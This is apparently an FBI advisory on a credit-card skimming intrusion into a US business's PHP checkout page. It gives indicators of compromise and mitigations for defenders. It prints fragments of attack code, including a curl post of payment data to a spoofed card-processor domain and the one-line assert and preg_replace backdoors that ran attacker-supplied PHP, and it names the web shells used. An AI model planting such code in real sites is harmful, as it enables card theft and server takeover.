The unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server.
Cyber actors also established backdoor access to the victim’s system by modifying two files within the checkout page. The FBI has identified and is sharing new indicators of compromise (IOCs), which may assist in network defense.
Unidentified cyber actors began targeting a US business in September 2020 from three Internet protocol (IP) addresses: 188.8.131.52, 184.108.40.206, and 220.127.116.11. The actors inserted malicious PHP code into the business’s customized online checkout page, checkout.php, by altering the associated TempOrders.php file. The checkout page was modified with the following include()statement:
Figure 1: Example include() statement
include()statements allow developers to import PHP code from one file into another file, which decreases the number of files developers must modify to update their code.
Malicious actors exploited this capability to insert the contents of TempOrders.php into the checkout cart_required_files.php file.
This cart_required_files.php file contained a require_once() statement that is nearly identical to the include() statement, except that if the identified file cannot be found, a warning is shown and program execution continues
Figure 2: Example “require_once” function
require_once() function to call and execute the TempOrders.php file, which contained code used to scrape and exfiltrate customer data from the US business’ shopping cart to a victim-specific PHP file “file_name.php”
$curl = curl_init();
curl_setopt($curl, CURLOPT_POST, true);
$out = curl_exec($curl);
Figure 3: Example code from TempOrders.php file identified on the victim host
The malicious code posts the customer’s payment information to a spoofed card processing domain, http://authorizen[.]net/, where the ‘n’ is added to impersonate or spoof http://authorize[.]net/, a legitimate card processing company’s domain. The unidentified cyber actors also established backdoor access to the business’ system by modifying two files.
First, the actors established a rudimentary back door by inserting the assert($_REQUEST[‘login’]) function. This function is designed for debugging and when called executes code submitted as the HTTP request parameter “login”. Upon execution, the system downloads a fully functional P.A.S. web shell onto the affected company’s webserver.
Figure 4: Example of code used to establish a rudimentary back door
Second, the actors inserted the PHP regular expression @preg_replace(“/f/e”,$_GET[‘u’],”fengjiao”), which is designed to insert and execute PHP code submitted as an HTTP request variable named “u”.
Figure 5: Example of HTTP request used to execute PHP code and enable the back door
Using the described techniques, the actors downloaded two PHP Webshells, P.A.S. and b374, which were leveraged as backdoors for further exploitation.
|IP Addresses||Uniform Resource Locators (URLs)|
The following malware tools were used during the captioned intrusion:
Filename : pas.php
File Size: 15.68 KB (16059 bytes)
File Type: Unknown
Note: P.A.S. web shell (aka Fobushell) was developed and published by Ukrainian developer Jaroslav Volodimirovich Panchenko (aka Profexer). In December 2016, the Department of Homeland Security published a report concerning attacks on the 2016 U.S. elections, which identified P.A.S. as a tool used by Russian Intelligence Services (referenced by the DHS as “GRIZZLY STEPPE”)
File Size: 97.23 KB (99559 bytes)
File Type: PHP
Note: This was a webshell published at Github.com/b374k/b374k.
Filename : Index.php
File Size: 206.25 KB (211204 bytes)
File Type: unknown
Note: Adminer is a legitimate PHP-based database tool. This tool is commonly used for managing content in MySQL databases, but it should not be exposed to the public as a general security practice.
FBI Recommended Mitigations:
- Update and patch all systems, to include operating systems, software, and any thirdparty code running as part of your website.
- Change default login credentials on all systems.
- Monitor requests performed against your e-commerce environment to identify possible malicious activity.
- Segregate and segment network systems to limit how easily cyber criminals can move from one to another.
- Secure all websites transferring sensitive information by using secure socket layer (SSL) protocol.
- Install third-party software/hardware from trusted sources. Coordinate with the manufacturer to ensure their security protocols prevent unauthorized access to data they store and/or process.
- Patch all systems for critical vulnerabilities, prioritizing timely patching of internetconnected servers for known vulnerabilities and software processing internet data, such as web browsers, browser plugins, and document readers.
- Actively scan and monitor web logs and web applications for unauthorized access,modification, and anomalous activities.
- Strengthen credential requirements and implement multifactor authentication to protect individual accounts.
- Conduct regular backups to reduce recovery time in the event of a compromise or cyber intrusion.
- Maintain an updated Incident Response Plan addressing cyber threat response.